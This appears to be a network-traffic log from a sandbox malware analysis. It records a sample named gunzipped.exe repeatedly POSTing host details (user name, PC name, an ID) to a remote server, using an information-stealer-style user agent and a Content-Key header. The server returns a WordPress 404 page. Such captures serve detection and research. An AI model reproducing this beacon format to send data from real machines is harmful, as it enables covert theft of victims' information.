Apr 17, 2024 03:16:59.342713118 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:16:59.342725992 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:16:59.342782021 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:16:59.342794895 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:16:59.342812061 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49711	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:16:59.708946943 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:16:59.916275024 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:00.888947010 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:16:59 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:00.888991117 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:00.889027119 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:00.889061928 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:00.889098883 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:00.889137983 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:00.889229059 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:00.889266014 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:00.889303923 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:17:00.889342070 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49712	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:17:01.257517099 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:17:01.465902090 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:17:02.374149084 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:17:01 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:17:02.374207973 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:17:02.374247074 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:17:02.374284029 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:17:02.374322891 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:17:02.374361992 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:17:02.374417067 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:17:02.374454975 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:17:02.374490976 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
